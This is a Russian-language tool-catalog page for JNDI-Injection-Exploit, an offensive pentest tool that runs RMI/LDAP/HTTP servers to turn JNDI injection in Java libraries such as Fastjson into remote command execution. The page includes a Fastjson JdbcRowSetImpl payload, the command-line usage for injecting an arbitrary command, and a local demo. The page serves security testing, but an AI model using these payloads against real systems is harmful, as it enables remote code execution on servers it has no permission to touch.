Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
JNDI-Injection-Exploit — JNDI注入测试工具(Инструмент, который генерирует JNDI-ссылки и может запускать несколько серверов для эксплуатации уязвимости JNDI Injection, например, Jackson, Fastjson и т.д) | Kitploit
Инструменты/GitHubGitHub/welk1n/jndi-injection-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложений
GitHubwelk1n/jndi-injection-exploit

JNDI-Injection-Exploit

JNDI注入测试工具(Инструмент, который генерирует JNDI-ссылки и может запускать несколько серверов для эксплуатации уязвимости JNDI Injection, например, Jackson, Fastjson и т.д)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
2.8k73046 лет назадПроверено Kitploit
Поделиться

JNDI-Injection-Exploit

Материалы по JNDI Injection

中文文档

相关文章

Описание

JNDI-Injection-Exploit — это инструмент для генерации рабочих JNDI-ссылок и предоставления фоновых служб путём запуска RMI-сервера, LDAP-сервера и HTTP-сервера. RMI-сервер и LDAP-сервер основаны на marshalsec и дополнительно модифицированы для связи с HTTP-сервером.

С помощью этого инструмента вы можете получить JNDI-ссылки и вставить их в ваш POC для тестирования уязвимости.

Например, это Fastjson-уязвимость POC:

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

Мы можем заменить "rmi://127.0.0.1:1099/Object" на ссылку, сгенерированную JNDI-Injection-Exploit, для тестирования уязвимости.

Отказ от ответственности

Вся информация и код предоставлены исключительно в образовательных целях и/или для тестирования ваших собственных систем на наличие этих уязвимостей.

Использование

Запуск:

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [команда] [-A] [адрес]

где:

  • -C — команда, выполняемая в удалённом class-файле.

    (необязательно, по умолчанию команда — "open /Applications/Calculator.app")

  • -A — адрес вашего сервера, может быть IP-адресом или доменом.

    (необязательно, по умолчанию адрес — адрес первого сетевого интерфейса)

На что обратить внимание:

  • убедитесь, что порты вашего сервера (1099, 1389, 8180) доступны.

    или вы можете изменить порт по умолчанию в классе run.ServerStart, строки 26–28.

  • ваша команда передаётся в Runtime.getRuntime().exec() в качестве параметров,

    поэтому вам нужно убедиться, что команда работает в методе exec().

    Команда в bash, например "bash -c ....", должна быть заключена в двойные кавычки.

Примеры

Локальная демонстрация:

  1. Запустите инструмент следующим образом:

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
    

    Скриншот:

    image-20191018154346759

  2. Предположим, что мы внедряем JNDI-ссылки, такие как rmi://ADDRESS/jfxllc, сгенерированные на шаге 1, в уязвимое приложение, которое можно атаковать с помощью JNDI-инъекции.

    В этом примере это выглядит так:

    root@kitploit:~
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }
    

    затем, когда мы запускаем этот код, команда будет выполнена,

    и в оболочку будет выведен лог:

    image-20191018154515787

Установка

Мы можем выбрать один из двух способов получения jar-файла.

  1. Загрузите последнюю версию jar из Релиза.

  2. Клонируйте исходный код локально и соберите (требуется Java 1.8+ и Maven 3.x+).

    root@kitploit:~
    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

В планах

  • (Выполнено) Объединить этот проект с JNDI-Injection-Bypass для генерации рабочих ссылок, когда trustURLCodebase равно false в более высоких версиях JDK по умолчанию.
  • … ...
Скачать инструмент